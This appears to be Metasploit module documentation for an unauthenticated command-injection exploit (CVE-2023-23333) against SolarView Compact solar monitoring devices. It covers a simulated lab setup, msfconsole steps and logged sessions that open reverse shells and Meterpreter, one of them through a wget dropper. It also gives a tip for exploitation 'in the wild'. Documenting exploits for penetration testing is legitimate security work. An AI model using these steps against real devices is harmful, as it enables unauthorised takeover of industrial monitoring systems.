## Vulnerable Application
`SolarView Compact` has a vulnerability that allows remote code execution on a vulnerable `SolarView Compact` device
by bypassing internal restrictions through the vulnerable endpoint `downloader.php` using the `file` parameter.
For more information:
* Read [Product Overview SolarView Compact](https://www.contec.com/products-services/environmental-monitoring/solarview/)
* Read this [article](https://attackerkb.com/topics/kE3lzTZGV2/cve-2023-23333) on attackerkb.com for more details.

### Installation
Ideally, you would need an `SolarView Compact appliance` running embedded Linux on an ARM-32 bit architecture (armle).
See [SolarView Compact appliance SVT-CPT-MC310](https://www.contec.com/products-services/environmental-monitoring/solarview/pv-package/sv-cpt-mc310/support/#section).
However, by downloading the firmware and install the `html` and `php` part of the firmware on a Linux distribution
like Ubuntu or Kali Linux, we can simulate the appliance and test the vulnerable endpoint.

This module has been tested on:
- [ ] Ubuntu Linux 22.04
* VirtualBox
* SolarView Compact v6.00
* PHP 7.4
- [ ] Kali Linux 2023.3
* Raspberry PI
* SolarView Compact v6.00
* PHP 8.2

Please follow below instructions below to create the simulation test bed on Ubuntu 22.04.
Similar instructions apply if you want to test it on an ARM device like a Raspberry PI with Kali Linux.
Please ensure that you install ARM-32 bit support.
```console
dpkg --add-architecture armhf
apt -y update
```

**Instructions for an SolarView Compact  firmware simulation installation on Ubuntu 22.04:**
* Download and install Ubuntu 22.04 server on VirtualBox.
* [Follow these instructions](https://linux.how2shout.com/how-to-install-ubuntu-22-04-server-on-virtualbox/).
* Download and install LAMP on Ubuntu 22.04 server.
* [Follow these instructions](https://linux.how2shout.com/2-ways-to-install-lamp-server-on-ubuntu-22-04-20-04/).

**Follow below steps to install the firmware and create the simulation test bed:**
* Login into Ubuntu 22.04 as root.
* Download [firmware v6.00](https://www.contec.com/download/contract/contract2/?itemid=b28c8b7c-9f40-40b2-843c-b5b04c035b0e&downloaditemid=d76a935b-adbc-45ff-b80f-6f651c1af463).
* Save firmware in `/tmp` directory. You need to register first.
* Add the user `contec`.
```console
adduser --home /home/contec --gid 0 --shell /bin/bash contec --disabled-password --gecos ''
```
* Create following directories and symbolic links:
```console
mkdir /home/www
mkdir /opt/svc
ln -s /var/www/html /home/www/html
ln -s /tmp /home/www/html/tmp
```
* Extract the `html` directory and `version` file from the firmware in `/home/www/html` with the following commands:
```console
cd /home/www/
tar -zxvf/tmp/svcUpdateV600.fpk --wildcards 'html/*' 'version'
mv version /opt/svc
chown -R contec.root /home/www/html/*
chown contec.root /opt/svc/version
```
* You should have a `/home/www/html` directory with the vulnerable endpoint `downloader.php` and the version file stored in `/opt/svc`
* Create a dummy `data_zip.sh` shell script in `/usr/local/bin` which is called from `downloader.php` and will trigger the RCE.
```console
echo '#!/bin/bash' > /usr/local/bin/data_zip.sh; chmod 755 /usr/local/bin/data_zip.sh
```
* Add the `short_open_tag On` setting in `php.ini`. You should check your php version to ensure that you edit the right file.
```console
php -v
nano /etc/php/7.4/apache2/php.ini 
```
* Configure your apache server to run under the user context `contec` by editing  `/etc/apache2/envvars`.
* Update the lines with environment variable `export APACHE_RUN_USER=contec` and `export APACHE_RUN_GROUP=root`.
```console
nano /etc/apache2/envvars
systemctl start apache2
```
* Test the module using the verification steps below.

## Verification Steps
- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/solarview_unauth_rce_cve_2023_23333`
- [ ] `set rhosts <ip-target>`
- [ ] `set rport <port>`
- [ ] `set lhost <ip-attacker>`
- [ ] `set target <0=PHP, 1=Unix Command, 2=Linux Dropper>`
- [ ] `exploit`
- [ ] you should get a `reverse shell` or `Meterpreter`
```
msf6 exploit(linux/http/solarview_unauth_rce_cve_2023_23333) > info

       Name: SolarView Compact unauthenticated remote command execution vulnerability.
     Module: exploit/linux/http/solarview_unauth_rce_cve_2023_23333
   Platform: PHP, Unix, Linux
       Arch: php, cmd, armle, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2023-05-15

Provided by:
  h00die-gr3y <h00die.gr3y@gmail.com>

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
      Id  Name
      --  ----
  =>  0   PHP
      1   Unix Command
      2   Linux Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS     192.168.201.55   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-meta
                                        sploit.html
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       The SolarView endpoint URL
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host


  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machin
                                      e or 0.0.0.0 to listen on all addresses.
  SRVPORT  8080             yes       The local port to listen on.


  When TARGET is 0:

  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  WEBSHELL                   no        The name of the webshell with extension. Webshell name will be randomly generated if left un
                                       set.

Payload information:

Description:
  CONTEC's SolarView™ Series enables you to monitor and visualize solar power and is only available in Japan.
  This module exploits a command injection vulnerability on the SolarView Compact `v6.00` web application
  via vulnerable endpoint `downloader.php`.
  After exploitation, an attacker will have full access with the same user privileges under
  which the webserver is running (typically as user `contec`).

References:
  https://nvd.nist.gov/vuln/detail/CVE-2023-23333
  https://attackerkb.com/topics/kE3lzTZGV2/cve-2023-23333
```
## Options
### TARGETURI
The uripath to the `SolarView Compact` web application. Default set is to `/`.
### WEBSHELL
You can use this option to set the filename and extension (should be .php) of the webshell.
This is handy if you want to test the webshell upload and execution with different file names.
to bypass any security settings on the Web and PHP server.

## Scenarios
### Ubuntu 22.04 PHP - php/meterpreter/reverse_tcp
```
msf6 exploit(linux/http/solarview_unauth_rce_cve_2023_23333) > set target 0
target => 0
msf6 exploit(linux/http/solarview_unauth_rce_cve_2023_23333) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.55:80 can be exploited.
[+] The target is vulnerable. SolarView Compact ver.6.00
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (39927 bytes) to 192.168.201.55
[+] Deleted EearlCwpEMWf.php
[*] Meterpreter session 8 opened (192.168.201.8:4444 -> 192.168.201.55:35158) at 2023-08-27 21:46:59 +0000

meterpreter > getuid
Server username: contec
meterpreter > sysinfo
Computer    : cuckoo
OS          : Linux cuckoo 5.15.0-78-generic #85-Ubuntu SMP Fri Jul 7 15:25:09 UTC 2023 x86_64
Meterpreter : php/linux
meterpreter >
```
### Ubuntu 22.04 Unix Command -  cmd/unix/reverse_bash
```
msf6 exploit(linux/http/solarview_unauth_rce_cve_2023_23333) > set target 1
target => 1
msf6 exploit(linux/http/solarview_unauth_rce_cve_2023_23333) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.55:80 can be exploited.
[+] The target is vulnerable. SolarView Compact ver.6.00
[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Command shell session 9 opened (192.168.201.8:4444 -> 192.168.201.55:39726) at 2023-08-27 21:48:23 +0000

uname -a
Linux cuckoo 5.15.0-78-generic #85-Ubuntu SMP Fri Jul 7 15:25:09 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
id
uid=1002(contec) gid=0(root) groups=0(root)
```
### Ubuntu 22.04 Linux Dropper -  linux/x64/meterpreter/reverse_tcp
```
msf6 exploit(linux/http/solarview_unauth_rce_cve_2023_23333) > set target 2
target => 2
msf6 exploit(linux/http/solarview_unauth_rce_cve_2023_23333) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/solarview_unauth_rce_cve_2023_23333) > set srvport 8080
srvport => 8080
msf6 exploit(linux/http/solarview_unauth_rce_cve_2023_23333) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.55:80 can be exploited.
[+] The target is vulnerable. SolarView Compact ver.6.00
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.201.8:8080/MjK0wR
[*] Client 192.168.201.55 (Wget/1.21.2) requested /MjK0wR
[*] Sending payload to 192.168.201.55 (Wget/1.21.2)
[*] Sending stage (3045380 bytes) to 192.168.201.55
[*] Meterpreter session 10 opened (192.168.201.8:4444 -> 192.168.201.55:33428) at 2023-08-27 21:50:25 +0000
[*] Command Stager progress - 100.00% done (112/112 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: contec
meterpreter > sysinfo
Computer     : 192.168.201.55
OS           : Ubuntu 22.04 (Linux 5.15.0-78-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit
```
### Kali Linux 2023.3 Linux Dropper -  linux/armle/meterpreter_reverse_tcp
To simulate and test the ARM 32-bit architecture using a Raspberry PI with ARM-32 bit support installed.
```
msf6 exploit(linux/http/solarview_unauth_rce_cve_2023_23333) > set target 2
target => 2
msf6 exploit(linux/http/solarview_unauth_rce_cve_2023_23333) > set payload linux/armle/meterpreter_reverse_tcp
payload => linux/armle/meterpreter_reverse_tcp
msf6 exploit(linux/http/solarview_unauth_rce_cve_2023_23333) > set srvport 8080
srvport => 8080
msf6 exploit(linux/http/solarview_unauth_rce_cve_2023_23333) > exploit

msf6 exploit(linux/http/solarview_unauth_rce_cve_2023_23333) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.8:80 can be exploited.
[+] The target is vulnerable. SolarView Compact ver.6.00
[*] Executing Linux Dropper for linux/armle/meterpreter_reverse_tcp
[*] Using URL: http://192.168.201.8:8080/ELImHODHJZuf
[*] Client 192.168.201.8 (Wget/1.21.3) requested /ELImHODHJZuf
[*] Sending payload to 192.168.201.8 (Wget/1.21.3)
[*] Meterpreter session 11 opened (192.168.201.8:4444 -> 192.168.201.8:44122) at 2023-08-28 06:36:11 +0000
[*] Command Stager progress - 100.00% done (118/118 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: contec
meterpreter > sysinfo
Computer     : 192.168.201.8
OS           : Debian  (Linux 5.15.44-Re4son-v8l+)
Architecture : aarch64
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux
meterpreter >
```
## Limitations
There are no limitations, but be aware of the fact that `x64` support for this module is only added for test purposes.
When exploiting the module in the wild, you should use `armle` payloads in case of target setting 2 (Linux Dropper).
